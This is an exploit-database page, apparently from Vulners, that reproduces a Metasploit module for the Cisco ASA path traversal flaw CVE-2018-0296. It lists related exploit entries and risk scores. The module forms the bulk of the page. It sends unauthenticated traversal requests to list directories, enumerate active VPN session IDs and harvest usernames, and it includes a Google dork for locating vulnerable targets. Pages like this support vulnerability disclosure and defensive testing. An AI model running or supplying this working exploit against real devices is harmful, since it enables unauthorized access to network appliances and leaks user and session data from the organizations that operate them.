Vulners
Lucene search
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
| Reporter | Title | Published | Views | Family All 51 |
|---|---|---|---|---|
 | Cisco Adaptive Security Appliance - Path Traversal Exploit | 29 Jun 201800:00 | – | zdt |
| Cisco Adaptive Security Appliance Path Traversal Exploit | 24 Jul 201800:00 | – | zdt |
| Cisco Adaptive Security Appliance - Path Traversal Exploit | 12 Aug 201900:00 | – | zdt |
 | Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Ios | 22 Jan 201821:15 | – | githubexploit |
| Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software | 21 Jun 201815:44 | – | githubexploit |
| Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software | 28 Sep 202005:00 | – | githubexploit |
| Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software | 21 Jun 201808:36 | – | githubexploit |
 | CVE-2025-20362 | 25 Sep 202516:12 | – | attackerkb |
| Cisco ASA Directory Traversal | 7 Jun 201800:00 | – | attackerkb |
 | CVE-2018-0296 | 28 Jun 201809:11 | – | circl |
10
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Cisco Adaptive Security Appliance - Path Traversal",
'Description' => %q{
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Google Dork:inurl:+CSCOE+/logon.html
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yassine Aboukir', #Initial discovery
'Angelo Ruwantha @h3llwings' #msf module
],
'References' =>
[
['EDB', '44956'],
['URL', 'https://www.exploit-db.com/exploits/44956/']
],
'Arch' => ARCH_CMD,
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix','linux'],
'Targets' =>
[
['3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)', {}]
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
OptString.new('SSL', [true, 'set it as true', 'true']),
OptString.new('RPORT', [true, '443', '443']),
], self.class)
end
def run
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
})
if res && res.code == 200 && res.body.include?("{'name'")
print_good("#{peer} is Vulnerable")
print_status("Directory Index ")
print_good(res.body)
res_dir = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
})
res_users = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
})
userIDs=res_users.body.scan(/[0-9]\w+/).flatten
print_status("CSCEO Directory ")
print_good(res_dir.body)
print_status("Active Session(s) ")
print_status(res_users.body)
x=0
begin
print_status("Getting User(s)")
while (x<=userIDs.length)
users = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
})
grab_username=users.body.scan(/user:\w+/)
nonstr=grab_username
if (!nonstr.nil? && nonstr!="")
print_good("#{nonstr}")
end
x=x+1
end
rescue
print_status("Complete")
end
else
print_error("safe")
return Exploit::CheckCode::Safe
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Aug 2019 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 25
CVSS 3.17.5
EPSS0.94404
SSVC